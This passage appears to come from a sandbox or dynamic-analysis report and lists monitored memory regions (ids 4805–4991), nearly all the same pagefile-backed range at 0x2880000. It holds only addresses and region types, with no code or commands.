start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4829 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 4830 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4875 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4939 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4940 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 4941 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 4991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = 